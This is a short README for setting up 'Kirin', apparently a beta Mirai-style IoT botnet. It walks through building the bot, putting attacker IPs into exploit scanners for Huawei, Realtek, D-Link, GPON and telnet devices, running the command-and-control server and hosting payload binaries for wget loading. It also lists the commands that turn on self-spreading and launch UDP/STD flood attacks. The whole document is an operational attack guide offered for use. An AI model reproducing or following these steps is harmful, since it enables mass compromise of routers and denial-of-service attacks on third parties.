//This is a Kirin and a beta so If there are any errors hmu

-Put the whole Kirin folder into the server-

-Unlimit this first
# nano /usr/include/bits/typesizes.h -> change 1024 to 99999
# ulimit -n 99999 
# python scan.py 1000 <start-range> <end-range>

-commands-
gcc -o build build.c
chmod 777 * -R
then go into bot/main.c and edit line 50, 51, 52, 53 and the bot port if you want
then go into bot/huawei.c and edit the ip there
Then go into bot/realtek_scanner.c and edit the ip there {
Then go into bot/dlink_scanner.c and edit the ip there{
Then go into bot/gpon80_scanner.c and edit the ip there{============for all the { place the ip when it has a 107 as the start
Then go into bot/gpon8080_scanner.c and edit the ip there{
Then go into bot/telnet_scanner.c and edit the ip there (100, 100, 100, 100)
Change the Ip in the scanListen.go also


-Compiling-
then save and do
./build (ip)
-save the wget so you can load bots to-

-CNC-
(After that do)
gcc -o server cnc.c -pthread
screen ./server BOTPORT(101 in the mains .c) 1(threads) 69(cnc port)
Press Control+A+D
nano login.txt
- make your username and password then Contro+X and Y
Service iptables stop
Service http restart
Screen -rx

or you can use your own server side



-TO GET THE REPS STARTED-
.DLINK ON
.HUAWEI ON
.GPON ON
.TELNET ON
.REALTEK ON

-TYPE OF ATTACK METHODS-
.UDP ip port time threads 
.STD ip port time threads

-Cnc commands-
btype to see what type of bots are connected


-Random stuff-
./debug x86_64
tail -f /var/log/httpd/access_log = to see if the bots are going into the payload

/cd/var/www/html/bins
ls

//Kirin v2 might add netis rep or server exploit rep who knows, adding hnap rep, adding zte rep







